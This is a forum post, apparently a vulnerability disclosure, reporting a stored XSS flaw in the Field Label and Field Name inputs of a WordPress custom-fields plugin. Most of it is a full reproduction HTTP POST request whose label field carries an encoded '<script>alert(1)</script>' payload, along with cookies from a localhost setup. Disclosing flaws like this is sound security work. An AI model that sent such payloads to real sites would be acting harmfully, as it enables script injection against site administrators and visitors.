Hey,
This plugin contains a XSS vulnerability because it does not properly sanitize the fields Field Label and Field Name. This allows authenticated users to inject arbitrary HTML/JS.
I find a simple stored XSS in this plugin.
Reproduce:
[ Moderator Note: Please post code or markup snippets between backticks or use the code button. ]
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://localhost/wordpress/wp-admin/post.php?post=7&action=edit&message=1
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1343974779%7C1304ba20ae5f10381f10d45816b42a46; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1343804013; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1343974779%7C2d847c25747638e0207d8ce22b2bdc1e; __atuvc=7%7C31
Content-Type: application/x-www-form-urlencoded
Content-Length: 2048
_wpnonce=df82f5886b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D7%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D7%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D7%26action%3Dedit%26message%3D6&post_ID=7&autosavenonce=d13e3a0568&meta-box-order-nonce=80a1d4ab4e&closedpostboxesnonce=177b469010&post_title=teste&samplepermalinknonce=b87c2a523f&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=01&aa=2012&hh=06&mn=45&ss=49&hidden_mm=08&cur_mm=08&hidden_jj=01&cur_jj=01&hidden_aa=2012&cur_aa=2012&hidden_hh=06&cur_hh=06&hidden_mn=45&cur_mn=53&original_publish=Update&save=Update&save_fields=true&fields%5B0%5D%5Bkey%5D=field_5018d1ab43dcf&fields%5B0%5D%5Blabel%5D=das%3Ch1%3Edas%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&fields%5B0%5D%5Bname%5D=das&fields%5B0%5D%5Btype%5D=text&fields%5B0%5D%5Binstructions%5D=&fields%5B0%5D%5Brequired%5D=0&fields%5B0%5D%5Bdefault_value%5D=&fields%5B0%5D%5Bformatting%5D=html&fields%5B1%5D%5Bkey%5D=field_5018d1ab44291&fields%5B1%5D%5Blabel%5D=&fields%5B1%5D%5Bname%5D=&fields%5B1%5D%5Btype%5D=text&fields%5B1%5D%5Binstructions%5D=&fields%5B1%5D%5Brequired%5D=0&fields%5B1%5D%5Bdefault_value%5D=&fields%5B1%5D%5Bformatting%5D=html&fields%5B999%5D%5Blabel%5D=New+Field&fields%5B999%5D%5Bname%5D=new_field&fields%5B999%5D%5Btype%5D=text&fields%5B999%5D%5Binstructions%5D=&fields%5B999%5D%5Brequired%5D=0&fields%5B999%5D%5Bdefault_value%5D=&fields%5B999%5D%5Bformatting%5D=html&location%5Brules%5D%5B0%5D%5Bparam%5D=post_type&location%5Brules%5D%5B0%5D%5Boperator%5D=%3D%3D&location%5Brules%5D%5B0%5D%5Bvalue%5D=post&location%5Ballorany%5D=all&menu_order=0&options%5Bposition%5D=normal&options%5Blayout%5D=default&options%5Bhide_on_screen%5D=&post_name=acf_teste